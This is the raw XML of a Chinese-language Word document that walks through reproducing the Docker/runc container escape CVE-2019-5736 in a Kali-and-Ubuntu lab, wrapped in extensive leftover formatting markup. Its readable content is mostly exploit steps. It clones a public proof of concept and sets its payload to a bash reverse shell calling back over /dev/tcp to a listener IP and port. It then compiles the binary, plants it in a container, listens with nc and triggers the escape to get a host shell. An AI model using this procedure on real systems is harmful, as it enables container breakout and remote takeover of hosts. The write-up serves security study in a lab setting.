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Docker逃逸漏洞复现（CVE-2019-5736）复现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_Toc2739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_Toc2739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_Toc6895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_Toc6895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_Toc26915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_Toc26915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2739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Kali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Ubuntu 16.04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6895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该漏洞影响范围：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docker version &lt;=18.09.2 RunC version &lt;=1.0-rc6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在ubuntu16.04 安装docker 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7" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine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curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh &amp;&amp; bash install.sh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操作流程如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下（按顺序执行）：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下载漏洞利用POC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clone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"https://github.com/Frichetten/CVE-2019-5736-PoC.git"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https://github.com/Frichetten/CVE-2019-5736-PoC.git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修改main.go程序中payload为：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payload = "#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/192.168.180.128/4444 0&gt;&amp;1"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692650" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="635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编译该程序：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CGO_ENABLED=0 GOOS=linux GOARCH=amd64  go build main.go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查看现有镜像：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images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584700" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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启动镜像：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run -t -i ubuntu:18.04 /bin/bash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查看运行的镜像：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ps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95800" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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将编译后的main程序拷贝到docker容器中：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docker cp main 62bf0ad61cd3:/home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在容器中赋予该文件执行权限：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chmod 777 main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482850" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="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接着在kali上启动端口监听：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nc -lvp 4444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然后在docker容器中执行./main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最后需要在ubuntu下，再次进入docker容器来触发逃逸，执行：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exec -it 62bf0ad61cd3 /bin/sh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exec -it 62bf0ad61cd3 /bin/bash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960" cy="811530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="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最终在Kali上成功获取到shell，执行ifconfig可以看到获取到了宿主机（ubuntu靶机）的ip信息，docker容器逃逸成功。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260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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5137150"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="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_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc26915"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r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"https://my.oschina.net/u/3076320/blog/4415659"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https://my.oschina.net/u/3076320/blog/4415659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5106AD"/>
    <w:rsid w:val="017D6083"/>
    <w:rsid w:val="01BE152A"/>
    <w:rsid w:val="01CE4455"/>
    <w:rsid w:val="01D354C0"/>
    <w:rsid w:val="01F834FD"/>
    <w:rsid w:val="0209371B"/>
    <w:rsid w:val="0227021B"/>
    <w:rsid w:val="02864A83"/>
    <w:rsid w:val="029C5A4B"/>
    <w:rsid w:val="02CB47AB"/>
    <w:rsid w:val="02D05B33"/>
    <w:rsid w:val="02D947AC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B22D98"/>
    <w:rsid w:val="05F11779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9250BD8"/>
    <w:rsid w:val="093078AB"/>
    <w:rsid w:val="09350CBE"/>
    <w:rsid w:val="093C0209"/>
    <w:rsid w:val="099460E4"/>
    <w:rsid w:val="09ED049A"/>
    <w:rsid w:val="0A4C4F97"/>
    <w:rsid w:val="0A683D10"/>
    <w:rsid w:val="0A773AD5"/>
    <w:rsid w:val="0AF97F26"/>
    <w:rsid w:val="0AFE43E5"/>
    <w:rsid w:val="0B1548E3"/>
    <w:rsid w:val="0B7B01B6"/>
    <w:rsid w:val="0BC60DED"/>
    <w:rsid w:val="0BD5505A"/>
    <w:rsid w:val="0BF04AD3"/>
    <w:rsid w:val="0BF45090"/>
    <w:rsid w:val="0C257C49"/>
    <w:rsid w:val="0C3D2BE4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C74AD2"/>
    <w:rsid w:val="0DED7C90"/>
    <w:rsid w:val="0E1F0855"/>
    <w:rsid w:val="0E504E0F"/>
    <w:rsid w:val="0E65188E"/>
    <w:rsid w:val="0E6A1DA7"/>
    <w:rsid w:val="0E8D7606"/>
    <w:rsid w:val="0EB54AF5"/>
    <w:rsid w:val="0EDB213E"/>
    <w:rsid w:val="0EF108EE"/>
    <w:rsid w:val="0F034F6C"/>
    <w:rsid w:val="0F2A39ED"/>
    <w:rsid w:val="0FB9431F"/>
    <w:rsid w:val="0FF64B8E"/>
    <w:rsid w:val="104963FC"/>
    <w:rsid w:val="1097075A"/>
    <w:rsid w:val="10D23DED"/>
    <w:rsid w:val="10D82F17"/>
    <w:rsid w:val="10DB28CB"/>
    <w:rsid w:val="10DE70B9"/>
    <w:rsid w:val="10F13955"/>
    <w:rsid w:val="10F37C66"/>
    <w:rsid w:val="111A65B2"/>
    <w:rsid w:val="1132632F"/>
    <w:rsid w:val="11606953"/>
    <w:rsid w:val="117C512D"/>
    <w:rsid w:val="119176E1"/>
    <w:rsid w:val="11A10BD0"/>
    <w:rsid w:val="11A9568F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36684"/>
    <w:rsid w:val="15AA4C10"/>
    <w:rsid w:val="15ED2D07"/>
    <w:rsid w:val="1601113C"/>
    <w:rsid w:val="161661D1"/>
    <w:rsid w:val="162B188B"/>
    <w:rsid w:val="162C2585"/>
    <w:rsid w:val="163A5647"/>
    <w:rsid w:val="16750E8D"/>
    <w:rsid w:val="1688481E"/>
    <w:rsid w:val="168E4A52"/>
    <w:rsid w:val="169A480C"/>
    <w:rsid w:val="16B843FE"/>
    <w:rsid w:val="16D46EA9"/>
    <w:rsid w:val="16DB2A21"/>
    <w:rsid w:val="170D0DE8"/>
    <w:rsid w:val="17937CBA"/>
    <w:rsid w:val="17CF184D"/>
    <w:rsid w:val="17F57FB0"/>
    <w:rsid w:val="17FB7F45"/>
    <w:rsid w:val="18714E25"/>
    <w:rsid w:val="18C1763B"/>
    <w:rsid w:val="18C55409"/>
    <w:rsid w:val="190242B1"/>
    <w:rsid w:val="190410FB"/>
    <w:rsid w:val="19403D5A"/>
    <w:rsid w:val="19910964"/>
    <w:rsid w:val="199E131F"/>
    <w:rsid w:val="19ED2A6F"/>
    <w:rsid w:val="1A375964"/>
    <w:rsid w:val="1A4064A8"/>
    <w:rsid w:val="1A846B42"/>
    <w:rsid w:val="1AC45A27"/>
    <w:rsid w:val="1AD603BD"/>
    <w:rsid w:val="1AE265AF"/>
    <w:rsid w:val="1AFF5BEA"/>
    <w:rsid w:val="1B5A24BF"/>
    <w:rsid w:val="1C0A5032"/>
    <w:rsid w:val="1C151F2C"/>
    <w:rsid w:val="1C245181"/>
    <w:rsid w:val="1C4F7664"/>
    <w:rsid w:val="1C715032"/>
    <w:rsid w:val="1C9D100E"/>
    <w:rsid w:val="1CA927D6"/>
    <w:rsid w:val="1CD84621"/>
    <w:rsid w:val="1D245EB2"/>
    <w:rsid w:val="1D98762D"/>
    <w:rsid w:val="1DD619C3"/>
    <w:rsid w:val="1DE62025"/>
    <w:rsid w:val="1DFF2500"/>
    <w:rsid w:val="1E041AA5"/>
    <w:rsid w:val="1E2F5BDB"/>
    <w:rsid w:val="1E554DFE"/>
    <w:rsid w:val="1EA015CE"/>
    <w:rsid w:val="1EA60DD6"/>
    <w:rsid w:val="1F4E7D8E"/>
    <w:rsid w:val="1F7563E7"/>
    <w:rsid w:val="1F840CB3"/>
    <w:rsid w:val="1FDB004A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416796"/>
    <w:rsid w:val="227A3A21"/>
    <w:rsid w:val="22B06B20"/>
    <w:rsid w:val="22CA252D"/>
    <w:rsid w:val="22E87084"/>
    <w:rsid w:val="230601BA"/>
    <w:rsid w:val="232C3F00"/>
    <w:rsid w:val="23510415"/>
    <w:rsid w:val="239F6549"/>
    <w:rsid w:val="23B059A3"/>
    <w:rsid w:val="23D33E76"/>
    <w:rsid w:val="23F32A04"/>
    <w:rsid w:val="24565DCC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7363FE0"/>
    <w:rsid w:val="273749A4"/>
    <w:rsid w:val="27420F82"/>
    <w:rsid w:val="2746791F"/>
    <w:rsid w:val="277230F5"/>
    <w:rsid w:val="27C34FD1"/>
    <w:rsid w:val="27E52D6D"/>
    <w:rsid w:val="280C4205"/>
    <w:rsid w:val="287E0EFF"/>
    <w:rsid w:val="28B05D07"/>
    <w:rsid w:val="2920114A"/>
    <w:rsid w:val="297275B9"/>
    <w:rsid w:val="29BC66E2"/>
    <w:rsid w:val="2A2075E5"/>
    <w:rsid w:val="2A465A91"/>
    <w:rsid w:val="2AD20E1C"/>
    <w:rsid w:val="2AFA41E0"/>
    <w:rsid w:val="2B434460"/>
    <w:rsid w:val="2B996EAB"/>
    <w:rsid w:val="2BB4190C"/>
    <w:rsid w:val="2BCB5EC9"/>
    <w:rsid w:val="2BE65147"/>
    <w:rsid w:val="2BFC64EF"/>
    <w:rsid w:val="2C123156"/>
    <w:rsid w:val="2C3777B7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8B6F1B"/>
    <w:rsid w:val="2DC95E7D"/>
    <w:rsid w:val="2DE45950"/>
    <w:rsid w:val="2DE74F03"/>
    <w:rsid w:val="2E0172AA"/>
    <w:rsid w:val="2E166F67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400526"/>
    <w:rsid w:val="30414F6A"/>
    <w:rsid w:val="30445CEA"/>
    <w:rsid w:val="30894927"/>
    <w:rsid w:val="30C656A2"/>
    <w:rsid w:val="310E004A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2280B61"/>
    <w:rsid w:val="3239469E"/>
    <w:rsid w:val="32577490"/>
    <w:rsid w:val="32BA04AF"/>
    <w:rsid w:val="33601388"/>
    <w:rsid w:val="33A174D9"/>
    <w:rsid w:val="33AC36B2"/>
    <w:rsid w:val="33D90411"/>
    <w:rsid w:val="34024669"/>
    <w:rsid w:val="3404250B"/>
    <w:rsid w:val="34225F04"/>
    <w:rsid w:val="342A1E03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E67697"/>
    <w:rsid w:val="381F693E"/>
    <w:rsid w:val="38511859"/>
    <w:rsid w:val="38630F80"/>
    <w:rsid w:val="38AF4352"/>
    <w:rsid w:val="38C23B95"/>
    <w:rsid w:val="38EE6875"/>
    <w:rsid w:val="390170DB"/>
    <w:rsid w:val="392B0D2B"/>
    <w:rsid w:val="39574C25"/>
    <w:rsid w:val="39BD4B09"/>
    <w:rsid w:val="39F04F32"/>
    <w:rsid w:val="3A127473"/>
    <w:rsid w:val="3A412CD4"/>
    <w:rsid w:val="3A5D4394"/>
    <w:rsid w:val="3A5E0E0A"/>
    <w:rsid w:val="3AD9794A"/>
    <w:rsid w:val="3AE06C65"/>
    <w:rsid w:val="3AE209A5"/>
    <w:rsid w:val="3B35140C"/>
    <w:rsid w:val="3B6868C4"/>
    <w:rsid w:val="3B7F4D0A"/>
    <w:rsid w:val="3C080B7D"/>
    <w:rsid w:val="3C231B9B"/>
    <w:rsid w:val="3C48174F"/>
    <w:rsid w:val="3C6838B1"/>
    <w:rsid w:val="3C6B4D74"/>
    <w:rsid w:val="3CC46F2A"/>
    <w:rsid w:val="3CCB29BF"/>
    <w:rsid w:val="3D0673BE"/>
    <w:rsid w:val="3D191284"/>
    <w:rsid w:val="3D1F0C41"/>
    <w:rsid w:val="3D405518"/>
    <w:rsid w:val="3D5845C1"/>
    <w:rsid w:val="3DEA4174"/>
    <w:rsid w:val="3DFB6856"/>
    <w:rsid w:val="3E4E092C"/>
    <w:rsid w:val="3E5A109B"/>
    <w:rsid w:val="3E6E21AD"/>
    <w:rsid w:val="3E8158A6"/>
    <w:rsid w:val="3E832C76"/>
    <w:rsid w:val="3EAF1568"/>
    <w:rsid w:val="3EEE5C6F"/>
    <w:rsid w:val="3F057C7B"/>
    <w:rsid w:val="3F66682A"/>
    <w:rsid w:val="3F7D187F"/>
    <w:rsid w:val="3FD35BAA"/>
    <w:rsid w:val="40173EDE"/>
    <w:rsid w:val="40B94D5F"/>
    <w:rsid w:val="40BB6A2D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A653C1"/>
    <w:rsid w:val="44C11ED2"/>
    <w:rsid w:val="44CA7B32"/>
    <w:rsid w:val="44D55CD6"/>
    <w:rsid w:val="44D8364D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8196792"/>
    <w:rsid w:val="482A4E29"/>
    <w:rsid w:val="48360895"/>
    <w:rsid w:val="48437D25"/>
    <w:rsid w:val="48504357"/>
    <w:rsid w:val="485B70AA"/>
    <w:rsid w:val="487F09EE"/>
    <w:rsid w:val="48996807"/>
    <w:rsid w:val="48BD65E9"/>
    <w:rsid w:val="48E12BCD"/>
    <w:rsid w:val="48F70621"/>
    <w:rsid w:val="491E6622"/>
    <w:rsid w:val="497E3D13"/>
    <w:rsid w:val="49907357"/>
    <w:rsid w:val="49C97134"/>
    <w:rsid w:val="49E04691"/>
    <w:rsid w:val="49F00AF6"/>
    <w:rsid w:val="49F3291B"/>
    <w:rsid w:val="4A090D46"/>
    <w:rsid w:val="4A0A55AA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F01492"/>
    <w:rsid w:val="4D1A205D"/>
    <w:rsid w:val="4D620603"/>
    <w:rsid w:val="4D9B110B"/>
    <w:rsid w:val="4DAE689E"/>
    <w:rsid w:val="4DDA1543"/>
    <w:rsid w:val="4DFC33D6"/>
    <w:rsid w:val="4E637C11"/>
    <w:rsid w:val="4E764C35"/>
    <w:rsid w:val="4EBF796A"/>
    <w:rsid w:val="4F601EB2"/>
    <w:rsid w:val="4F9678A6"/>
    <w:rsid w:val="4FB37DCE"/>
    <w:rsid w:val="502F4B2F"/>
    <w:rsid w:val="504418D3"/>
    <w:rsid w:val="508617AF"/>
    <w:rsid w:val="50AB5109"/>
    <w:rsid w:val="50ED09F2"/>
    <w:rsid w:val="50EE1CF2"/>
    <w:rsid w:val="50F56EF0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893352"/>
    <w:rsid w:val="52B2451F"/>
    <w:rsid w:val="53350F26"/>
    <w:rsid w:val="533D19EF"/>
    <w:rsid w:val="53E43CBA"/>
    <w:rsid w:val="54581C0B"/>
    <w:rsid w:val="5464452E"/>
    <w:rsid w:val="54760E95"/>
    <w:rsid w:val="54A46E3D"/>
    <w:rsid w:val="54E906BD"/>
    <w:rsid w:val="54E95B53"/>
    <w:rsid w:val="55174F08"/>
    <w:rsid w:val="554A5F34"/>
    <w:rsid w:val="55705409"/>
    <w:rsid w:val="558950EA"/>
    <w:rsid w:val="55895CD7"/>
    <w:rsid w:val="55A512CE"/>
    <w:rsid w:val="56872251"/>
    <w:rsid w:val="56A32225"/>
    <w:rsid w:val="56C1206C"/>
    <w:rsid w:val="56F03967"/>
    <w:rsid w:val="56FF6F63"/>
    <w:rsid w:val="574D32DC"/>
    <w:rsid w:val="5795769D"/>
    <w:rsid w:val="57E4450D"/>
    <w:rsid w:val="5809255A"/>
    <w:rsid w:val="582A0ED2"/>
    <w:rsid w:val="583145B1"/>
    <w:rsid w:val="58862CE5"/>
    <w:rsid w:val="589F3E44"/>
    <w:rsid w:val="58A45CC9"/>
    <w:rsid w:val="590E6E67"/>
    <w:rsid w:val="595A1F5B"/>
    <w:rsid w:val="597F2A10"/>
    <w:rsid w:val="598453A5"/>
    <w:rsid w:val="598E27CA"/>
    <w:rsid w:val="59AE326F"/>
    <w:rsid w:val="59D75CF2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A396F"/>
    <w:rsid w:val="62546BA1"/>
    <w:rsid w:val="625B741A"/>
    <w:rsid w:val="626F566D"/>
    <w:rsid w:val="627473D8"/>
    <w:rsid w:val="62F258A7"/>
    <w:rsid w:val="634400C6"/>
    <w:rsid w:val="635E6930"/>
    <w:rsid w:val="63B02B56"/>
    <w:rsid w:val="63C31A57"/>
    <w:rsid w:val="643C23EA"/>
    <w:rsid w:val="646E49F1"/>
    <w:rsid w:val="64867BEB"/>
    <w:rsid w:val="6521729E"/>
    <w:rsid w:val="65272EF5"/>
    <w:rsid w:val="653B5F16"/>
    <w:rsid w:val="657E3A9D"/>
    <w:rsid w:val="658209AB"/>
    <w:rsid w:val="65BA73D7"/>
    <w:rsid w:val="660F361A"/>
    <w:rsid w:val="66971104"/>
    <w:rsid w:val="669E6199"/>
    <w:rsid w:val="66A35BC1"/>
    <w:rsid w:val="66BB4DB6"/>
    <w:rsid w:val="66BC3DBB"/>
    <w:rsid w:val="66C41D1D"/>
    <w:rsid w:val="66DC04CD"/>
    <w:rsid w:val="66FA2156"/>
    <w:rsid w:val="672809D6"/>
    <w:rsid w:val="678F49C4"/>
    <w:rsid w:val="67A721DA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A0D7547"/>
    <w:rsid w:val="6A277002"/>
    <w:rsid w:val="6A457BB3"/>
    <w:rsid w:val="6A7F6757"/>
    <w:rsid w:val="6A814678"/>
    <w:rsid w:val="6AC67DDB"/>
    <w:rsid w:val="6AE026E3"/>
    <w:rsid w:val="6AED577B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C366ED"/>
    <w:rsid w:val="6D287D37"/>
    <w:rsid w:val="6D2C0CF6"/>
    <w:rsid w:val="6D5F201D"/>
    <w:rsid w:val="6DD7583E"/>
    <w:rsid w:val="6E147350"/>
    <w:rsid w:val="6E4342CA"/>
    <w:rsid w:val="6E511BD0"/>
    <w:rsid w:val="6E714A5B"/>
    <w:rsid w:val="6E895D7D"/>
    <w:rsid w:val="6EEB10EE"/>
    <w:rsid w:val="6EF039F9"/>
    <w:rsid w:val="6F6C28EA"/>
    <w:rsid w:val="6FBB67E7"/>
    <w:rsid w:val="6FCB3B64"/>
    <w:rsid w:val="702F6304"/>
    <w:rsid w:val="71425631"/>
    <w:rsid w:val="718E076F"/>
    <w:rsid w:val="719047C3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324E30"/>
    <w:rsid w:val="744D702A"/>
    <w:rsid w:val="745A6603"/>
    <w:rsid w:val="748A1498"/>
    <w:rsid w:val="74E05B5E"/>
    <w:rsid w:val="752148BD"/>
    <w:rsid w:val="75480CB5"/>
    <w:rsid w:val="757B4688"/>
    <w:rsid w:val="75A5567D"/>
    <w:rsid w:val="75EB574B"/>
    <w:rsid w:val="76151A31"/>
    <w:rsid w:val="76A011BE"/>
    <w:rsid w:val="76B31913"/>
    <w:rsid w:val="76F64619"/>
    <w:rsid w:val="77267071"/>
    <w:rsid w:val="77433973"/>
    <w:rsid w:val="77747827"/>
    <w:rsid w:val="778E5A76"/>
    <w:rsid w:val="78686049"/>
    <w:rsid w:val="78D90973"/>
    <w:rsid w:val="78E31E39"/>
    <w:rsid w:val="792765B9"/>
    <w:rsid w:val="79583C60"/>
    <w:rsid w:val="797E7E66"/>
    <w:rsid w:val="798D4AAE"/>
    <w:rsid w:val="79AA2A68"/>
    <w:rsid w:val="79D31E5D"/>
    <w:rsid w:val="79DF43C6"/>
    <w:rsid w:val="79EE6791"/>
    <w:rsid w:val="7A257EEB"/>
    <w:rsid w:val="7A5E3071"/>
    <w:rsid w:val="7A6F1097"/>
    <w:rsid w:val="7A75405A"/>
    <w:rsid w:val="7A82268F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A5541A"/>
    <w:rsid w:val="7DB14BB2"/>
    <w:rsid w:val="7DCB7922"/>
    <w:rsid w:val="7E174627"/>
    <w:rsid w:val="7E3B483E"/>
    <w:rsid w:val="7E6042FC"/>
    <w:rsid w:val="7E655069"/>
    <w:rsid w:val="7E856862"/>
    <w:rsid w:val="7EA61D58"/>
    <w:rsid w:val="7EB735FB"/>
    <w:rsid w:val="7F5B1505"/>
    <w:rsid w:val="7F9512F7"/>
    <w:rsid w:val="7F98506D"/>
    <w:rsid w:val="7FB84BC5"/>
    <w:rsid w:val="7FF16BD2"/>
    <w:rsid w:val="7F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2020-12-02T03:01:37Z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